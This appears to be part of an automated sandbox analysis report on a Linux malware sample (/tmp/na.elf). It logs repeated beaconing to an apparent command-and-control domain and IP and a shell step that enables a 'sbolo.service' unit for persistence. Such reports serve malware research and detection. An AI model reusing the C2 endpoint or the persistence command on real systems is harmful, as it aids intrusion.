                                        Oct 7, 2024 16:32:01.248380899 CEST235615848091.200.103.117192.168.2.14
                                        Oct 7, 2024 16:32:01.248542070 CEST5848023561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:32:01.253446102 CEST235615848091.200.103.117192.168.2.14
                                        Oct 7, 2024 16:32:05.260102034 CEST5848223561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:32:05.265301943 CEST235615848291.200.103.117192.168.2.14
                                        Oct 7, 2024 16:32:05.265368938 CEST5848223561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:32:05.266674995 CEST5848223561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:32:05.271995068 CEST235615848291.200.103.117192.168.2.14
                                        Oct 7, 2024 16:32:06.902586937 CEST235615848291.200.103.117192.168.2.14
                                        Oct 7, 2024 16:32:06.902766943 CEST5848223561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:32:06.907923937 CEST235615848291.200.103.117192.168.2.14
                                        Oct 7, 2024 16:32:17.524889946 CEST5848423561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:32:17.529777050 CEST235615848491.200.103.117192.168.2.14
                                        Oct 7, 2024 16:32:17.529856920 CEST5848423561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:32:17.530925989 CEST5848423561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:32:17.535742998 CEST235615848491.200.103.117192.168.2.14
                                        Oct 7, 2024 16:32:19.141798973 CEST235615848491.200.103.117192.168.2.14
                                        Oct 7, 2024 16:32:19.142085075 CEST5848423561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:32:19.146946907 CEST235615848491.200.103.117192.168.2.14
                                        TimestampSource PortDest PortSource IPDest IP
                                        Oct 7, 2024 16:28:53.012841940 CEST3693253192.168.2.148.8.8.8
                                        Oct 7, 2024 16:28:53.020127058 CEST53369328.8.8.8192.168.2.14
                                        Oct 7, 2024 16:28:58.689661026 CEST5735153192.168.2.148.8.8.8
                                        Oct 7, 2024 16:28:58.697555065 CEST53573518.8.8.8192.168.2.14
                                        Oct 7, 2024 16:29:03.345670938 CEST4558253192.168.2.148.8.8.8
                                        Oct 7, 2024 16:29:03.660681009 CEST53455828.8.8.8192.168.2.14
                                        Oct 7, 2024 16:29:09.365724087 CEST4629353192.168.2.148.8.8.8
                                        Oct 7, 2024 16:29:09.374880075 CEST53462938.8.8.8192.168.2.14
                                        Oct 7, 2024 16:29:18.083436012 CEST5855653192.168.2.148.8.8.8
                                        Oct 7, 2024 16:29:18.392437935 CEST53585568.8.8.8192.168.2.14
                                        Oct 7, 2024 16:29:27.031972885 CEST4538953192.168.2.148.8.8.8
                                        Oct 7, 2024 16:29:27.041310072 CEST53453898.8.8.8192.168.2.14
                                        Oct 7, 2024 16:29:32.672904968 CEST5058753192.168.2.148.8.8.8
                                        Oct 7, 2024 16:29:32.699841976 CEST53505878.8.8.8192.168.2.14
                                        Oct 7, 2024 16:29:42.321409941 CEST4235853192.168.2.148.8.8.8
                                        Oct 7, 2024 16:29:42.328583956 CEST53423588.8.8.8192.168.2.14
                                        Oct 7, 2024 16:29:49.957261086 CEST3992053192.168.2.148.8.8.8
                                        Oct 7, 2024 16:29:49.964222908 CEST53399208.8.8.8192.168.2.14
                                        Oct 7, 2024 16:30:00.639090061 CEST5445453192.168.2.148.8.8.8
                                        Oct 7, 2024 16:30:00.646137953 CEST53544548.8.8.8192.168.2.14
                                        Oct 7, 2024 16:30:11.463881016 CEST4105853192.168.2.148.8.8.8
                                        Oct 7, 2024 16:30:11.476097107 CEST53410588.8.8.8192.168.2.14
                                        Oct 7, 2024 16:30:19.128659964 CEST5921553192.168.2.148.8.8.8
                                        Oct 7, 2024 16:30:19.135488033 CEST53592158.8.8.8192.168.2.14
                                        Oct 7, 2024 16:30:25.758140087 CEST5759353192.168.2.148.8.8.8
                                        Oct 7, 2024 16:30:25.766241074 CEST53575938.8.8.8192.168.2.14
                                        Oct 7, 2024 16:30:32.408091068 CEST3953453192.168.2.148.8.8.8
                                        Oct 7, 2024 16:30:32.415441990 CEST53395348.8.8.8192.168.2.14
                                        Oct 7, 2024 16:30:43.079498053 CEST5957553192.168.2.148.8.8.8
                                        Oct 7, 2024 16:30:43.089122057 CEST53595758.8.8.8192.168.2.14
                                        Oct 7, 2024 16:30:53.718226910 CEST3821553192.168.2.148.8.8.8
                                        Oct 7, 2024 16:30:53.725639105 CEST53382158.8.8.8192.168.2.14
                                        Oct 7, 2024 16:30:58.388519049 CEST4372853192.168.2.148.8.8.8
                                        Oct 7, 2024 16:30:58.396529913 CEST53437288.8.8.8192.168.2.14
                                        Oct 7, 2024 16:31:04.030870914 CEST4445153192.168.2.148.8.8.8
                                        Oct 7, 2024 16:31:04.038640022 CEST53444518.8.8.8192.168.2.14
                                        Oct 7, 2024 16:31:07.685758114 CEST3627553192.168.2.148.8.8.8
                                        Oct 7, 2024 16:31:07.692267895 CEST53362758.8.8.8192.168.2.14
                                        Oct 7, 2024 16:31:16.361872911 CEST4758653192.168.2.148.8.8.8
                                        Oct 7, 2024 16:31:16.369734049 CEST53475868.8.8.8192.168.2.14
                                        Oct 7, 2024 16:31:21.685781956 CEST4140253192.168.2.148.8.8.8
                                        Oct 7, 2024 16:31:21.693394899 CEST53414028.8.8.8192.168.2.14
                                        Oct 7, 2024 16:31:29.316126108 CEST4515553192.168.2.148.8.8.8
                                        Oct 7, 2024 16:31:29.323535919 CEST53451558.8.8.8192.168.2.14
                                        Oct 7, 2024 16:31:35.500525951 CEST3376753192.168.2.141.1.1.1
                                        Oct 7, 2024 16:31:35.500569105 CEST4402053192.168.2.141.1.1.1
                                        Oct 7, 2024 16:31:35.507555962 CEST53440201.1.1.1192.168.2.14
                                        Oct 7, 2024 16:31:35.508616924 CEST53337671.1.1.1192.168.2.14
                                        Oct 7, 2024 16:31:38.054825068 CEST5612653192.168.2.148.8.8.8
                                        Oct 7, 2024 16:31:38.061584949 CEST53561268.8.8.8192.168.2.14
                                        Oct 7, 2024 16:31:44.846800089 CEST5174353192.168.2.148.8.8.8
                                        Oct 7, 2024 16:31:44.854408026 CEST53517438.8.8.8192.168.2.14
                                        Oct 7, 2024 16:31:47.501451969 CEST5285553192.168.2.148.8.8.8
                                        Oct 7, 2024 16:31:47.512249947 CEST53528558.8.8.8192.168.2.14
                                        Oct 7, 2024 16:31:59.476157904 CEST5246353192.168.2.148.8.8.8
                                        Oct 7, 2024 16:31:59.483472109 CEST53524638.8.8.8192.168.2.14
                                        Oct 7, 2024 16:32:05.251709938 CEST5398453192.168.2.148.8.8.8
                                        Oct 7, 2024 16:32:05.259263992 CEST53539848.8.8.8192.168.2.14
                                        Oct 7, 2024 16:32:16.907840967 CEST4341853192.168.2.148.8.8.8
                                        Oct 7, 2024 16:32:17.523463011 CEST53434188.8.8.8192.168.2.14
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Oct 7, 2024 16:28:53.012841940 CEST192.168.2.148.8.8.80x9db9Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:28:58.689661026 CEST192.168.2.148.8.8.80xa4e8Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:29:03.345670938 CEST192.168.2.148.8.8.80xc3c1Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:29:09.365724087 CEST192.168.2.148.8.8.80xa7c5Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:29:18.083436012 CEST192.168.2.148.8.8.80xd10cStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:29:27.031972885 CEST192.168.2.148.8.8.80x51ecStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:29:32.672904968 CEST192.168.2.148.8.8.80x9cfeStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:29:42.321409941 CEST192.168.2.148.8.8.80x49dbStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:29:49.957261086 CEST192.168.2.148.8.8.80x6bfbStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:30:00.639090061 CEST192.168.2.148.8.8.80x20edStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:30:11.463881016 CEST192.168.2.148.8.8.80x2789Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:30:19.128659964 CEST192.168.2.148.8.8.80x6cd4Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:30:25.758140087 CEST192.168.2.148.8.8.80x156aStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:30:32.408091068 CEST192.168.2.148.8.8.80x8379Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:30:43.079498053 CEST192.168.2.148.8.8.80xe805Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:30:53.718226910 CEST192.168.2.148.8.8.80xebc3Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:30:58.388519049 CEST192.168.2.148.8.8.80xc89dStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:31:04.030870914 CEST192.168.2.148.8.8.80x4f83Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:31:07.685758114 CEST192.168.2.148.8.8.80xfa6cStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:31:16.361872911 CEST192.168.2.148.8.8.80x8c08Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:31:21.685781956 CEST192.168.2.148.8.8.80x1278Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:31:29.316126108 CEST192.168.2.148.8.8.80x4498Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:31:35.500525951 CEST192.168.2.141.1.1.10x6a91Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:31:35.500569105 CEST192.168.2.141.1.1.10x6a43Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                        Oct 7, 2024 16:31:38.054825068 CEST192.168.2.148.8.8.80xeb31Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:31:44.846800089 CEST192.168.2.148.8.8.80xe096Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:31:47.501451969 CEST192.168.2.148.8.8.80xc110Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:31:59.476157904 CEST192.168.2.148.8.8.80x39bbStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:32:05.251709938 CEST192.168.2.148.8.8.80x1bdcStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:32:16.907840967 CEST192.168.2.148.8.8.80xcfacStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Oct 7, 2024 16:28:53.020127058 CEST8.8.8.8192.168.2.140x9db9No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:28:58.697555065 CEST8.8.8.8192.168.2.140xa4e8No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:29:03.660681009 CEST8.8.8.8192.168.2.140xc3c1No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:29:09.374880075 CEST8.8.8.8192.168.2.140xa7c5No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:29:18.392437935 CEST8.8.8.8192.168.2.140xd10cNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:29:27.041310072 CEST8.8.8.8192.168.2.140x51ecNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:29:32.699841976 CEST8.8.8.8192.168.2.140x9cfeNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:29:42.328583956 CEST8.8.8.8192.168.2.140x49dbNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:29:49.964222908 CEST8.8.8.8192.168.2.140x6bfbNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:30:00.646137953 CEST8.8.8.8192.168.2.140x20edNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:30:11.476097107 CEST8.8.8.8192.168.2.140x2789No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:30:19.135488033 CEST8.8.8.8192.168.2.140x6cd4No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:30:25.766241074 CEST8.8.8.8192.168.2.140x156aNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:30:32.415441990 CEST8.8.8.8192.168.2.140x8379No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:30:43.089122057 CEST8.8.8.8192.168.2.140xe805No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:30:53.725639105 CEST8.8.8.8192.168.2.140xebc3No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:30:58.396529913 CEST8.8.8.8192.168.2.140xc89dNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:31:04.038640022 CEST8.8.8.8192.168.2.140x4f83No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:31:07.692267895 CEST8.8.8.8192.168.2.140xfa6cNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:31:16.369734049 CEST8.8.8.8192.168.2.140x8c08No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:31:21.693394899 CEST8.8.8.8192.168.2.140x1278No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:31:29.323535919 CEST8.8.8.8192.168.2.140x4498No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:31:35.508616924 CEST1.1.1.1192.168.2.140x6a91No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:31:35.508616924 CEST1.1.1.1192.168.2.140x6a91No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:31:38.061584949 CEST8.8.8.8192.168.2.140xeb31No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:31:44.854408026 CEST8.8.8.8192.168.2.140xe096No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:31:47.512249947 CEST8.8.8.8192.168.2.140xc110No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:31:59.483472109 CEST8.8.8.8192.168.2.140x39bbNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:32:05.259263992 CEST8.8.8.8192.168.2.140x1bdcNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                        Oct 7, 2024 16:32:17.523463011 CEST8.8.8.8192.168.2.140xcfacNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false

                                        System Behavior

                                        Start time (UTC):14:28:51
                                        Start date (UTC):07/10/2024
                                        Path:/tmp/na.elf
                                        Arguments:/tmp/na.elf
                                        File size:5777432 bytes
                                        MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                        Start time (UTC):14:28:51
                                        Start date (UTC):07/10/2024
                                        Path:/tmp/na.elf
                                        Arguments:-
                                        File size:5777432 bytes
                                        MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                        Start time (UTC):14:28:51
                                        Start date (UTC):07/10/2024
                                        Path:/tmp/na.elf
                                        Arguments:-
                                        File size:5777432 bytes
                                        MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                        Start time (UTC):14:28:51
                                        Start date (UTC):07/10/2024
                                        Path:/bin/sh
                                        Arguments:sh -c "systemctl enable sbolo.service > /dev/null 2>&1"
                                        File size:129816 bytes
                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                        Start time (UTC):14:28:51
                                        Start date (UTC):07/10/2024
                                        Path:/bin/sh
                                        Arguments:-
                                        File size:129816 bytes
                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                        Start time (UTC):14:28:51
                                        Start date (UTC):07/10/2024
                                        Path:/usr/bin/systemctl
                                        Arguments:systemctl enable sbolo.service
                                        File size:996584 bytes
                                        MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                        Start time (UTC):14:28:52
                                        Start date (UTC):07/10/2024
                                        Path:/tmp/na.elf
                                        Arguments:-
                                        File size:5777432 bytes
                                        MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                        Start time (UTC):14:28:51
                                        Start date (UTC):07/10/2024
                                        Path:/usr/lib/systemd/systemd
                                        Arguments:-
                                        File size:1620224 bytes
                                        MD5 hash:9b2bec7092a40488108543f9334aab75

                                        Start time (UTC):14:28:51
                                        Start date (UTC):07/10/2024
                                        Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                        Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                        File size:22760 bytes
                                        MD5 hash:3633b075f40283ec938a2a6a89671b0e